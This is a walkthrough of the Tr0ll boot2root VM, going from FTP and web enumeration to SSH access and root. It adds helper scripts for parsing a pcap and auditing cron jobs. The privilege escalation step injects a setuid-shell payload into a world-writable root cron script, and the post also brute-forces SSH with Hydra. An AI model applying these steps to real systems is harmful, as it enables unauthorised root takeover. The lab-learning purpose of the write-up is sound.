Tr0ll is a boot2root, from Maleus. It was inspired by the constant trolling of the machines within the OSCP labs. The goal is simple, gain root and get Proof.txt from the /root directory. Not for the easily frustrated! Fair warning, there be trolls ahead!
# nmap -n -A -p- 192.168.127.103

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap [NSE: writeable]
22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-title: Site doesn't have a title (text/html).
Starting from the top: anonymous FTP login is permitted, and Nmap has already listed the FTP root directory, which holds a single world-writable capture file. I logged in manually and downloaded lol.pcap. Running strings over it is enough to pull the interesting text out of the capture:

# strings lol.pcap
[...snip...]
W150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
WWell, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P

Sucks, you were so close... gotta TRY HARDER!
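strings is fine for a capture this small, but it mixes TCP header bytes into the text (the stray "W" prefixes above) and loses the order of the exchange. As an added example, not code from the original post or from the author, here is a dependency-free reader for classic pcap files (Ethernet/IPv4/TCP only) that separates the port-21 control dialogue from the data-channel payload, so the RETR and the transferred file line up. It does not parse lol.pcap itself: the capture it runs on is constructed inline to mirror what the strings output reveals (the 150 reply and the secret_stuff.txt text), with invented addresses and ports.

```python
import struct
from collections import defaultdict

PCAP_LINKTYPE_ETHERNET = 1


def iter_pcap_records(data):
    """Yield the raw frame bytes of each record in a classic (non-pcapng) pcap file."""
    (magic,) = struct.unpack_from("<I", data, 0)
    if magic == 0xA1B2C3D4:      # file written little-endian
        endian = "<"
    elif magic == 0xD4C3B2A1:    # file written big-endian
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng / nanosecond variants not handled)")
    linktype = struct.unpack_from(endian + "HHiIII", data, 4)[5]
    if linktype != PCAP_LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled")
    off = 24                                          # global header is 24 bytes
    while off + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", data, off)
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def parse_tcp(frame):
    """Return (src_ip, sport, dst_ip, dport, payload) for an Ethernet/IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # not IPv4
        return None
    ip = frame[14:]
    if ip[0] >> 4 != 4 or ip[9] != 6:                     # not IPv4 / not TCP
        return None
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack_from("!H", ip, 2)[0]
    ip = ip[:total_len]                                   # drop Ethernet trailer padding
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:]
    if len(tcp) < 20:
        return None
    sport, dport = struct.unpack_from("!HH", tcp, 0)
    data_off = (tcp[12] >> 4) * 4
    return src, sport, dst, dport, tcp[data_off:]


def ftp_sessions(pcap_bytes):
    """Split a capture into FTP control lines and per-flow data-channel bytes.

    Returns (control_lines, data): control_lines is a list of ("C" | "S", line) in capture
    order; data maps (src, sport, dst, dport) -> bytes for every other TCP flow with payload.
    Assumes in-order delivery and no retransmissions, which holds for a clean lab capture.
    """
    control, data = [], defaultdict(bytearray)
    for frame in iter_pcap_records(pcap_bytes):
        parsed = parse_tcp(frame)
        if parsed is None:
            continue
        src, sport, dst, dport, payload = parsed
        if not payload:                                   # SYN/ACK/FIN only
            continue
        if dport == 21:
            control.append(("C", payload))
        elif sport == 21:
            control.append(("S", payload))
        else:
            data[(src, sport, dst, dport)] += payload
    lines = []
    for direction, chunk in control:
        # FTP control is CRLF-delimited text; one segment may carry several lines.
        lines += [(direction, l) for l in chunk.decode("latin-1").split("\r\n") if l]
    return lines, {k: bytes(v) for k, v in data.items()}


def _ip_bytes(addr):
    return bytes(int(x) for x in addr.split("."))


def build_frame(src_ip, sport, dst_ip, dport, payload):
    """Minimal Ethernet/IPv4/TCP frame for constructed captures; checksums stay zero (ignored above)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     _ip_bytes(src_ip), _ip_bytes(dst_ip)) + tcp
    return b"\x02" * 6 + b"\x04" * 6 + b"\x08\x00" + ip


def build_pcap(frames):
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, PCAP_LINKTYPE_ETHERNET)
    return header + b"".join(struct.pack("<IIII", 0, i, len(f), len(f)) + f
                             for i, f in enumerate(frames))


def sample_capture():
    """Constructed stand-in for lol.pcap (NOT the real file): anonymous login, then RETR of
    secret_stuff.txt over an active-mode data connection from port 20. Addresses are invented."""
    c, s, cport = "10.0.0.5", "10.0.0.10", 40001
    secret = (b"Well, well, well, aren't you just a clever little devil, you almost found the "
              b"sup3rs3cr3tdirlol :-P\r\n\r\nSucks, you were so close... gotta TRY HARDER!\r\n")
    frames = [
        build_frame(s, 21, c, cport, b"220 (vsFTPd 3.0.2)\r\n"),
        build_frame(c, cport, s, 21, b"USER anonymous\r\n"),
        build_frame(s, 21, c, cport, b"331 Please specify the password.\r\n"),
        build_frame(c, cport, s, 21, b"PASS lol\r\n"),
        build_frame(s, 21, c, cport, b"230 Login successful.\r\n"),
        build_frame(c, cport, s, 21, b"RETR secret_stuff.txt\r\n"),
        build_frame(s, 21, c, cport, b"150 Opening BINARY mode data connection for "
                                     b"secret_stuff.txt (%d bytes).\r\n" % len(secret)),
        build_frame(s, 20, c, cport + 1, secret),
        build_frame(s, 21, c, cport, b"226 Transfer complete.\r\n"),
    ]
    return build_pcap(frames)


if __name__ == "__main__":
    ctl, files = ftp_sessions(sample_capture())
    for direction, line in ctl:
        print(("C> " if direction == "C" else "S< ") + line)
    for flow, blob in files.items():
        print("data %s:%d -> %s:%d (%d bytes):\n%s" % (flow + (len(blob), blob.decode("latin-1"))))
```

Point it at a real file with ftp_sessions(open("lol.pcap", "rb").read()); passive-mode transfers show up the same way, since anything that is not port 21 is treated as a data flow. A capture with retransmissions or out-of-order segments needs sequence-number reassembly, which this deliberately skips.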
Having a look around the Apache service reveals a few friendly images.
Other tools such as nikto didn't turn up anything more. After a little pondering I decided to try sup3rs3cr3tdirlol (the name leaked in the capture) as a directory in the URL, and was presented with a listing containing a single file, roflmao. This turned out to be a binary that doesn't appear to do anything more than print the following message:
Find address 0x0856BF to proceed
This has the potential to send you on a massive goose chase, but I was now thinking like a proper troll :p. Address… Web address…?
Heh, nice: /0x0856BF/ exists on the web server, and it holds two subdirectories, good_luck and this_folder_contains_the_password, with the following files:

Index of /0x0856BF/good_luck
[TXT] which_one_lol.txt   2014-08-09 23:32   109

maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

Index of /0x0856BF/this_folder_contains_the_password
[TXT] Pass.txt   2014-08-09 23:18   12

Good_job_:)
I took the list in which_one_lol.txt as potential usernames and the string Good_job_:) as the password, then ran them through Hydra to try my luck against SSH. Unfortunately, after about 7-8 incorrect logins the SSH service closes for a while before coming back up. Hydra doesn't seem to save its session when this happens, so carrying on after the service came back didn't seem possible. To this end, I just tried the logins manually, since there weren't actually that many.
However, this password was not valid for any of these accounts :(

More trolls, however. Recall the name of the directory: this_folder_contains_the_password. What's in that folder? Pass.txt. Try the filename itself as the password...?

That finally got me a successful login.
I started some basic enumeration until this happened:
Broadcast Message from [email protected] (somewhere) at 9:20 ...

TIMES UP LOL!
Connection to 192.168.127.103 closed by remote host.

Oh for God's sake, haha. This seems to happen every five minutes or so, but you can just reconnect each time.
I got a hit whilst searching for world-writable files:

find / -perm -0002 -type f -print
[...snip...]
/lib/log/cleaner.py

-rwxrwxrwx 1 root root 96 Aug 13 00:13 /lib/log/cleaner.py
A world-writable script owned by root? Jackpot (rasta_mouse braces himself for more trolls)... Its contents:
#!/usr/bin/env python
import os
import sys

try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
I simply added two new lines to this, so that whatever runs the script (presumably as root, given the owner) drops a setuid copy of the shell in /tmp:

os.system('cp /bin/sh /tmp/sh')
os.system('chmod 4777 /tmp/sh')
I waited a few minutes and eventually my shell turned up!

-rwxrwxrwx 1 root root 112204 Aug 29 10:31 sh

# id
uid=1002(overflow) gid=1002(overflow) euid=0(root) groups=0(root),1002(overflow)
# whoami
root
From here, you can cat the flag.

# cat root/proof.txt
Good job, you did it!

702a8c18d29c6f3ca0d99ef5712bfbdc
I also wanted to take a look at the automated processes going on, so here they are. The crontab entries (no user field, so a per-user crontab, and the setuid shell shows it runs as root):

*/5 * * * * /usr/bin/python /opt/lmao.py
*/2 * * * * /usr/bin/python /lib/log/cleaner.py

And /opt/lmao.py, which is what kicks you off every five minutes:

#!/usr/bin/env python
import os

os.system('echo "TIMES UP LOL!"|wall')
os.system("pkill -u 'overflow'")
sys.exit()

Note that lmao.py never imports sys, so the final sys.exit() raises a NameError, but only after the wall and the pkill have already run, which is why the troll still works.
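The cleaner.py finding and the crontab listing above come down to one question: does anything cron runs as root live in a file, or a directory, that an unprivileged user can write to? The following is an added example, not code from the original post or from the VM, that answers it for a per-user crontab. It pulls the absolute paths out of each command and reports those whose other-write bit is set (the same test as find / -perm -0002, scoped to what cron actually executes), and also those whose parent directory is world-writable without the sticky bit, since that lets you replace the file even when the file itself is not writable. It runs against a constructed sandbox that mirrors the two entries found on Tr0ll; the sandbox paths and mode bits are assumptions made for the demo.

```python
import os
import re
import shutil
import stat
import tempfile

# Absolute paths inside a cron command. Wildcards and paths containing spaces are
# deliberately not matched; they need the shell to resolve them.
ABS_PATH = re.compile(r"(?<![\w./-])/[\w./-]+")


def crontab_commands(crontab_text):
    """Yield the command field of each entry in a per-user crontab (crontab -l format).

    Handles five-field schedules and @reboot-style shortcuts; skips comments,
    blank lines and VAR=value assignments.
    """
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        n_fields = 2 if line.startswith("@") else 6
        fields = line.split(None, n_fields - 1)
        if len(fields) == n_fields:
            yield fields[-1]


def world_writable_cron_targets(crontab_text):
    """Return [(path, reason)] for regular files a cron command references that a
    low-privileged user could modify: the file is world-writable, or its directory
    is world-writable and not sticky (so the file can be unlinked and replaced)."""
    hits = []
    for cmd in crontab_commands(crontab_text):
        for path in ABS_PATH.findall(cmd):
            try:
                st = os.stat(path)
                parent = os.stat(os.path.dirname(path))
            except OSError:
                continue                        # missing interpreter, dangling path, etc.
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & stat.S_IWOTH:
                hits.append((path, "file is world-writable"))
            elif parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
                hits.append((path, "directory is world-writable and not sticky"))
    return hits


def demo_sandbox():
    """Constructed sandbox mirroring the crontab on the box: cleaner.py is mode 0777
    as found, lmao.py is 0755. Returns (crontab_text, sandbox_root)."""
    root = tempfile.mkdtemp()
    paths = {"cleaner": os.path.join(root, "lib", "log", "cleaner.py"),
             "lmao": os.path.join(root, "opt", "lmao.py")}
    for p in paths.values():
        os.makedirs(os.path.dirname(p), exist_ok=True)
        os.chmod(os.path.dirname(p), 0o755)     # pin the dir mode whatever the umask is
        with open(p, "w") as f:
            f.write("#!/usr/bin/env python\nimport os\n")
    os.chmod(paths["cleaner"], 0o777)
    os.chmod(paths["lmao"], 0o755)
    crontab = ("# constructed copy of the two entries found on Tr0ll, pointed at the sandbox\n"
               "*/5 * * * * /usr/bin/python %s\n"
               "*/2 * * * * /usr/bin/python %s\n" % (paths["lmao"], paths["cleaner"]))
    return crontab, root


def cleanup(root):
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    crontab, root = demo_sandbox()
    try:
        for path, reason in world_writable_cron_targets(crontab):
            print("%s: %s" % (path, reason))
    finally:
        cleanup(root)
```

On a real box you would feed it the output of crontab -l for root (or /etc/crontab and /etc/cron.d/*, which carry an extra user field the parser here does not strip). One caveat on the payload itself: copying /bin/sh with mode 4777 gave an euid-0 shell here because Ubuntu's /bin/sh is dash, which keeps the effective uid, and that matches the id output above. If the copied shell is bash, it drops euid back to the real uid on start unless invoked with -p, so in that case run /tmp/sh -p.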